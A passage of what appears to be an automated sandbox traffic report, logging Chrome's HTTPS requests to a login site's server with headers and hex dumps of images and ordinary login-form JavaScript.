                                                      2025-01-12 23:47:51 UTC15953INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 18 00 00 01 18 08 03 00 00 00 b0 50 19 be 00 00 03 00 50 4c 54 45 00 00 00 1c 10 0d 16 0a 09 13 0a 08 11 08 07 12 09 07 0a 06 05 11 09 07 08 05 04 05 03 02 02 01 00 20 12 0d 04 02 01 fc fb fa 22 15 0e 23 16 0f 23 16 11 1d 12 0e 06 03 01 25 17 11 24 17 11 20 15 10 f3 f3 f3 1e 14 11 6c 35 03 69 34 01 38 1d 13 04 02 02 64 32 02 62 29 01 32 2d 29 3a 19 04 af 77 0a a5 68 05 3f 20 07 b4 80 22 25 16 0f 49 24 03 51 26 02 e9 3f 2f 88 4f 07 57 2b 02 f9 ae 00 4d 22 0a 3b 35 38 fe ed 2a 4e 1d 0b fe fb 7c 37 1e 10 64 32 05 50 22 10 ca a2 0f ef e0 23 5a 2d 03 97 5f 04 da a6 42 b7 89 11 da b6 0a fe f5 42 e4 ce 1a fd fc fc fe fb b9 fe fb 91 ba a4 87 ff fc cf 95 60 0b a1 57 33 7c 69 43 d8 9d 22 f6 e5 82 c3 98 20 40
                                                      Data Ascii: PNGIHDRPPLTE "##%$ l5i48d2b)2-):wh? "%I$Q&?/OW+M";58*N|7d2P"#Z-_BB`W3|iC" @
                                                      2025-01-12 23:47:52 UTC9182INData Raw: 0c d5 35 24 ab a2 e5 93 51 bb bb 5b db 1d d4 19 97 4c 09 5c da 9e 81 f3 0c a7 76 75 68 75 5a 8d 99 b0 3b f8 fe 80 d3 bc f8 c0 a9 cf be fe fa d4 a6 b3 09 39 86 4f 87 e0 80 cb 6b 87 8f bd ce eb e5 80 2d 07 7e a3 7b df 46 20 41 22 5e 98 22 26 55 14 30 56 bc d4 a8 5b 99 3a db c0 7f fb 2d 62 09 e3 2b 6a a7 00 22 9b 4e 6b c3 5e bf b7 eb 1b 06 a2 40 f2 d4 7c 5c 12 15 2d 63 17 e0 aa 66 b7 e5 9e bc ab 52 fb b8 e9 6c 2a 07 6e 3b e9 16 5b 9d 8e bb 49 e2 7d ef fc fc e3 cf 3f 7e 94 2a 47 bc 47 83 7a 24 21 92 ce ff 30 4d b3 38 89 ee a6 10 45 ab 81 63 ba 01 55 32 dd f1 e2 e3 e5 d5 0a 46 35 50 9c 16 fa 85 ad 5e 6d d0 ad 17 68 77 9b d1 b4 52 b5 d0 ae aa 79 55 61 d3 cf 92 d5 1d 74 07 83 5c 35 2b 70 f5 9c 69 7a 64 16 af 9c 5b 8a b5 1c f5 24 bf b9 4f 67 6a 90 e2 f5 e5 80 4d
                                                      Data Ascii: 5$Q[L\vuhuZ;9Ok-~{F A"^"&U0V[:-b+j"Nk^@|\-cfRl*n;[I}?~*GGz$!0M8EcU2F5P^mhwRyUat\5+pizd[$OgjM


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      55192.168.2.44980320.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:50 UTC372OUTGET /js/www/login.js?ver=1606790076 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:51 UTC314INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:50 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 191
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 01 Dec 2020 02:34:36 GMT
                                                      ETag: "5fc5abbc-bf"
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:51 UTC191INData Raw: 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 0d 0a 09 24 28 27 23 6c 6f 67 69 6e 46 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 09 20 20 20 20 24 28 74 68 69 73 29 2e 63 68 69 6c 64 72 65 6e 28 27 23 6c 6f 67 69 6e 53 75 62 27 29 2e 70 72 6f 70 28 27 64 69 73 61 62 6c 65 64 27 2c 20 74 72 75 65 29 3b 0d 0a 09 7d 29 3b 0d 0a 0d 0a 09 24 28 22 23 6c 6f 67 69 6e 53 75 62 22 29 2e 70 72 6f 70 28 27 64 69 73 61 62 6c 65 64 27 2c 20 66 61 6c 73 65 29 3b 0d 0a 0d 0a 7d 29 3b
                                                      Data Ascii: jQuery(document).ready(function() {$('#loginForm').submit(function(){ $(this).children('#loginSub').prop('disabled', true);});$("#loginSub").prop('disabled', false);});


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      56192.168.2.44980420.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:50 UTC612OUTGET /images_plus/main/logo.gif?ver=1612840274 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:51 UTC356INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:50 GMT
                                                      Content-Type: image/gif
                                                      Content-Length: 18406
                                                      Connection: close
                                                      Last-Modified: Tue, 09 Feb 2021 03:11:14 GMT
                                                      ETag: "6021fd52-47e6"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:51 UTC3740INData Raw: 47 49 46 38 39 61 e0 00 5b 00 f7 a3 00 ff ea 19 8a c0 af 4f a0 86 c3 cb 2c 4e 99 4d d0 e6 df c5 e0 d7 88 b2 3d 82 bb a9 53 a2 89 23 86 5a 24 88 69 c5 d0 2a 23 87 5a 62 aa 94 91 c4 b4 43 99 7e e0 d8 24 ef f7 f4 b1 d5 c9 6b a6 45 4f 9b 4d a6 bf 35 40 93 52 23 88 68 e2 dd 21 ee de 20 d4 d6 26 e0 ee ea d1 d2 28 72 b3 9e 33 91 73 b4 c5 30 31 8d 55 31 8d 56 8a b5 3b f1 e4 1d 40 94 51 f1 f8 f6 97 b8 39 99 bc 37 a1 cc bf 5e a1 48 a7 c3 33 c0 dd d4 31 90 72 7b af 40 b6 d8 cd 7a ac 41 40 98 7c 99 c8 b9 a7 d0 c3 6c b0 9b 5d 9f 49 b6 c9 2e 5e a8 91 e2 f0 eb d4 e8 e1 be c9 2e 6c a8 44 7b b8 a5 9f bc 36 33 8d 55 52 9b 4c dd d7 25 80 af 3f 16 81 5d 71 a8 44 ed dd 20 e8 e0 20 17 81 5d 22 86 5a e3 de 21 62 a3 47 15 80 5e ce d0 29 af c3 32 61 a1 48 42 94 51 90 b5 3b 79 ae
                                                      Data Ascii: GIF89a[O,NM=S#Z$i*#ZbC~$kEOM5@R#h! &(r3s01U1V;@Q97^H31r{@zA@|l]I.^.lD{63URL%?]qD ]"Z!bG^)2aHBQ;y
                                                      2025-01-12 23:47:51 UTC4096INData Raw: 34 9e 16 ea 30 01 64 c7 74 21 4b 0e c5 f6 a8 cc a3 30 07 9e 35 b8 04 a3 46 27 06 9b 7c 3c 28 92 a4 49 94 2a 47 26 86 29 4a 26 4d 51 36 71 12 01 ee 11 d4 10 8d 15 1b f4 06 02 3d 94 dc bd 05 3e 88 2d 7a cb b4 e4 02 ba 13 96 53 7e 1e 1d 73 10 85 4c 38 6a 0c d2 9b c8 10 cb 72 45 39 88 5d 20 e9 82 07 47 4d 90 94 7a cd 55 d6 1d 0b 01 01 00 21 f9 04 05 1e 00 a3 00 2c 5b 00 42 00 36 00 0c 00 40 08 ff 00 45 09 1c 48 b0 a0 c1 83 08 13 26 f4 01 0a 54 13 82 40 40 3d 41 98 22 54 01 82 1f 42 85 72 30 50 42 28 04 09 34 26 10 a8 d1 83 40 0e 1f 0d fe 60 d2 10 94 13 51 3e 9e b4 0c 62 10 81 c7 50 13 04 3a 60 a1 31 a5 a8 90 1b 27 68 74 b0 40 a8 4f 85 48 93 2a 4d 1a 71 c9 cb 1f 4d 7a 80 22 f2 d0 07 cd 81 1e 34 22 10 f8 40 94 c7 02 0b 44 65 0d 95 00 68 0a 51 0e 34 5e 84 a0 b5
                                                      Data Ascii: 40dt!K05F'|<(I*G&)J&MQ6q=>-zS~sL8jrE9] GMzU!,[B6@EH&T@@=A"TBr0PB(4&@`Q>bP:`1'ht@OH*MqMz"4"@DehQ4^
                                                      2025-01-12 23:47:51 UTC4096INData Raw: a6 cd 9b 38 73 5a 14 05 73 22 45 20 a3 7a 28 04 e5 83 e2 90 88 45 29 7e a0 e8 a0 a2 a8 14 a3 0a 54 fc 28 81 e4 a8 93 2c 46 41 d5 3a 2a 2b 4c 9a 0b 29 06 19 0a 93 e7 a8 83 4e 39 44 e5 98 c0 c1 c7 50 1e 3a 4a 65 61 b5 c0 82 0f 12 46 49 f8 b0 40 ad 57 9b 40 6b 5a 04 35 c4 6a d6 93 15 3d f4 8d b9 d1 2a 56 ae 5c bd be b4 39 53 b0 ce cb 98 63 c2 04 5a 91 28 43 84 9d 7d 56 14 69 51 b1 54 8b 8d 31 23 30 0b 91 e2 92 a0 43 9d 50 6c 82 b4 e2 d2 51 4d 29 3e 8d 3a 75 54 28 c7 14 b3 6e 85 fa 97 88 ec 8a 43 86 4e 6c f0 1a c8 53 b8 a2 f2 16 58 da f6 6d d3 05 52 27 00 ef 0a 99 b8 4b 1d 41 22 32 2a 29 3a 33 c8 6b 22 47 9f c7 c5 7d ba 00 c7 05 0f 34 4e e0 b8 5d 38 45 ef 03 61 c6 ac 9c b9 7f ff fc 94 35 64 99 7f 04 c6 14 10 00 21 f9 04 05 1e 00 a3 00 2c 5b 00 46 00 28 00 0c
                                                      Data Ascii: 8sZs"E z(E)~T(,FA:*+L)N9DP:JeaFI@W@kZ5j=*V\9ScZ(C}ViQT1#0CPlQM)>:uT(nCNlSXmR'KA"2*):3k"G}4N]8Ea5d!,[F(
                                                      2025-01-12 23:47:51 UTC4096INData Raw: 32 74 08 51 22 45 8b 18 87 76 fc 28 98 64 28 93 a2 50 6e 25 48 04 d4 12 1f a2 a0 b2 24 f2 03 66 10 08 12 c0 fa 9d dd d5 23 8b b0 63 21 b4 26 fc da f0 6c 82 4d 96 34 74 2a ca 09 cb a9 4d 80 83 15 b5 e0 41 cf d9 0e 0a 68 09 94 30 7b 79 e1 d8 87 03 02 00 21 f9 04 05 1e 00 a3 00 2c 5b 00 42 00 36 00 0c 00 40 08 ff 00 45 09 1c f8 03 14 28 1f 03 07 ea 00 d5 23 a1 c3 87 10 23 3a f4 61 b0 89 c0 82 07 7b 80 5a a2 90 61 c2 0f a1 42 39 48 c8 21 d4 83 81 13 42 4d 10 15 12 81 40 16 a1 52 08 4c 11 8a 85 c0 21 44 40 01 09 62 10 a1 0f 26 06 9f 2c 6c e8 30 41 ca 90 10 44 41 a0 19 32 c5 07 81 2d 11 84 3c 29 55 e5 82 87 18 11 3a 1c 2a b1 ab d7 87 39 97 34 10 05 f4 20 4f 50 43 44 fd c8 49 74 60 c9 02 49 13 38 48 29 21 29 04 09 a1 5c 86 2c b0 e0 03 5e 09 1f 16 94 b4 a9 d1 a0
                                                      Data Ascii: 2tQ"Ev(d(Pn%H$f#c!&lM4t*MAh0{y!,[B6@E(##:a{ZaB9H!BM@RL!D@b&,l0ADA2-<)U:*94 OPCDIt`I8H)!)\,^
                                                      2025-01-12 23:47:51 UTC2378INData Raw: a8 50 a2 63 5b ea dd cb 37 e5 40 22 67 63 02 56 da 90 85 5c 0e a2 68 ca 0d 45 f7 a2 5b 0e 6d 45 ea f4 0b 6a 09 4c 50 4f 66 d6 84 1a 6a 72 d5 04 75 45 05 0d 35 b4 a8 5a b2 3a 2e a3 85 20 a1 c0 d6 a8 53 ab 86 4d 2c 32 ad 5d d2 78 4f 53 4e 6d 56 26 6b d7 a2 16 7c 85 ed 10 62 4d 92 b6 45 df 35 7d b4 af f3 e7 d0 a3 4b 2f 19 10 00 21 f9 04 05 1e 00 a3 00 2c 5c 00 46 00 30 00 08 00 40 08 e4 00 45 3d 01 45 90 89 28 81 04 41 19 3c c8 d0 43 81 50 a1 38 2c 10 05 21 05 c4 50 29 3e 1c 84 88 00 01 c4 07 a2 3c 86 9a b0 a0 c1 40 82 44 1a 98 4c 98 b2 21 c4 89 0c 39 84 02 79 70 c2 48 51 1c 0f b2 c0 78 d0 22 0b 20 a0 9e 30 14 05 54 e8 d0 83 1f 20 92 0c f9 c1 a6 04 08 14 25 84 42 80 33 54 81 05 1f a4 4a f8 b0 40 e6 cf 84 a0 52 02 65 d9 00 22 0b 51 36 2f 86 fa 00 41 2d 44 89
                                                      Data Ascii: Pc[7@"gcV\hE[mEjLPOfjruE5Z:. SM,2]xOSNmV&k|bME5}K/!,\F0@E=E(A<CP8,!P)><@DL!9ypHQx" 0T %B3TJ@Re"Q6/A-D


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      57192.168.2.44980520.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:50 UTC604OUTGET /images/dc_hot.gif?ver=1606790076 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:51 UTC354INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:50 GMT
                                                      Content-Type: image/gif
                                                      Content-Length: 1388
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:34:36 GMT
                                                      ETag: "5fc5abbc-56c"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:51 UTC1388INData Raw: 47 49 46 38 39 61 15 00 0c 00 a2 04 00 ff ff ff ff 00 00 ff 05 05 ff ff 00 ff ff ff 00 00 00 00 00 00 00 00 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 ff 0b 58 4d 50 20 44 61 74 61 58 4d 50 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 30 36 37 20 37 39 2e 31 35 37 37 34 37 2c 20 32 30 31 35 2f 30 33 2f 33 30 2d 32 33 3a 34 30 3a 34 32 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d 6c 6e 73 3a 72 64 66 3d 22 68
                                                      Data Ascii: GIF89a!NETSCAPE2.0!XMP DataXMP<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="h


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      58192.168.2.44980720.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:50 UTC604OUTGET /images/dc_new.gif?ver=1606790076 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:51 UTC354INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:51 GMT
                                                      Content-Type: image/gif
                                                      Content-Length: 1251
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:34:36 GMT
                                                      ETag: "5fc5abbc-4e3"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:51 UTC1251INData Raw: 47 49 46 38 39 61 15 00 0c 00 a2 04 00 ff ff ff ff 00 00 ff 05 05 ff ff 00 ff ff ff 00 00 00 00 00 00 00 00 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 ff 0b 58 4d 50 20 44 61 74 61 58 4d 50 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d 6c 6e 73 3a 72 64 66 3d 22 68
                                                      Data Ascii: GIF89a!NETSCAPE2.0!XMP DataXMP<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="h


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      59192.168.2.44980820.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:51 UTC382OUTGET /plus/js/unite/encforms.js?ver=1723544858 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:51 UTC318INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:51 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 11516
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 13 Aug 2024 10:27:38 GMT
                                                      ETag: "66bb351a-2cfc"
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:51 UTC3778INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 24 29 7b 0a 20 20 20 20 6c 65 74 20 6c 6f 67 6f 75 74 6c 6f 63 6b 20 3d 20 66 61 6c 73 65 3b 0a 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 27 73 75 62 6d 69 74 27 2c 27 66 6f 72 6d 5b 61 63 74 69 6f 6e 3d 22 2f 6c 6f 67 69 6e 5f 61 63 74 69 6f 6e 22 5d 3a 6e 6f 74 28 2e 68 69 64 65 29 27 2c 66 75 6e 63 74 69 6f 6e 28 65 76 74 29 7b 0a 20 20 20 20 09 65 76 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0a 20 20 20 20 09 69 66 28 24 28 74 68 69 73 29 2e 64 61 74 61 28 27 69 73 53 75 62 6d 69 74 27 29 29 7b 0a 20 20 20 20 09 09 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 20 20 20 20 09 7d 0a 20 20 20 20 09 76 61 72 20 64 20 3d 20 6e 65 77 20 44 61 74 65 28 29 2c 20 76 61 6c 69 64 63 6f 64 65 20 3d 20 4d 61
                                                      Data Ascii: (function($){ let logoutlock = false; $(document).on('submit','form[action="/login_action"]:not(.hide)',function(evt){ evt.preventDefault(); if($(this).data('isSubmit')){ return false; } var d = new Date(), validcode = Ma
                                                      2025-01-12 23:47:51 UTC4096INData Raw: 5f 28 27 6c 6f 67 69 6e 54 72 61 6e 73 2e 76 65 72 69 66 79 52 65 61 6c 4e 61 6d 65 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 6f 62 6a 2e 73 74 61 74 75 73 20 3d 3d 20 27 61 75 74 68 27 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 69 65 6c 64 6e 61 6d 65 20 3d 20 27 61 75 74 68 63 6f 64 65 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 69 74 6c 65 20 3d 20 5f 5f 28 27 6c 6f 67 69 6e 54 72 61 6e 73 2e 76 65 72 69 66 79 54 77 69 63 65 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 27 73 77 61 6c 27 20 69 6e 20 77 69 6e 64 6f 77 29 7b 0a 20 20 20 20 20
                                                      Data Ascii: _('loginTrans.verifyRealName'); } if(obj.status == 'auth'){ fieldname = 'authcode'; title = __('loginTrans.verifyTwice'); } if('swal' in window){
                                                      2025-01-12 23:47:51 UTC3642INData Raw: 2e 64 65 73 74 72 6f 79 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 7b 22 65 6e 61 62 6c 65 44 61 72 6b 4d 6f 64 65 22 3a 20 74 72 75 65 2c 62 69 7a 53 74 61 74 65 3a 20 70 6f 73 74 5b 27 66 72 5f 75 73 65 72 6e 61 6d 65 27 5d 7d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 70 2e 73 68 6f 77 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2c 63 61 70 74 63 68 61 4d 6f 75 6e 74 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 20 20 20 20 20 20
                                                      Data Ascii: .destroy(); },{"enableDarkMode": true,bizState: post['fr_username']}); cap.show(); } ,captchaMount = function(){ var t = document.createElement("script");


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      60192.168.2.44980920.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:51 UTC636OUTGET /images_plus/index/en/204x30-live-streaming-02.gif?ver=1683086141 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:51 UTC353INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:51 GMT
                                                      Content-Type: image/gif
                                                      Content-Length: 427
                                                      Connection: close
                                                      Last-Modified: Wed, 03 May 2023 03:55:41 GMT
                                                      ETag: "6451db3d-1ab"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:51 UTC427INData Raw: 47 49 46 38 39 61 cc 00 17 00 c4 00 00 4d a0 80 c4 e0 d5 89 c0 aa f1 f8 f5 21 88 60 3f 98 75 b6 d8 ca 6b b0 95 30 90 6a a7 d0 c0 5c a8 8a d3 e8 e0 7a b8 a0 e2 f0 ea 98 c8 b5 ff ff ff 12 80 55 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 05 00 00 10 00 2c 00 00 00 00 cc 00 17 00 00 05 ff 20 24 8e 64 69 9e 68 aa ae 6c eb be 70 2c cf 74 6d df 78 ae ef 7c ef ff c0 a0 70 48 2c 1a 8f c8 56 01 80 38 2d 9b 00 a6 69 59 80 2c a3 58 40 72 cb e5 3e 1e 81 d3 57 00 19 3c 16 26 33 fa cb 66 6b bb f0 38 f0 1b 36 8d 21 89 6f 73 a4 f8 32 20 6d 6d 55 72 84 85 37 74 62 0f 64 7d 0f 7f 23 79 0f 4d 88 86 94 95 34 93 25 77 65
                                                      Data Ascii: GIF89aM!`?uk0j\zU!NETSCAPE2.0!, $dihlp,tmx|pH,V8-iY,X@r>W<&3fk86!os2 mmUr7tbd}#yM4%we


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      61192.168.2.44981020.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:51 UTC387OUTGET /plus/js/custom/login_custom.js?ver=1606790105 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:51 UTC311INHTTP/1.1 200 OK
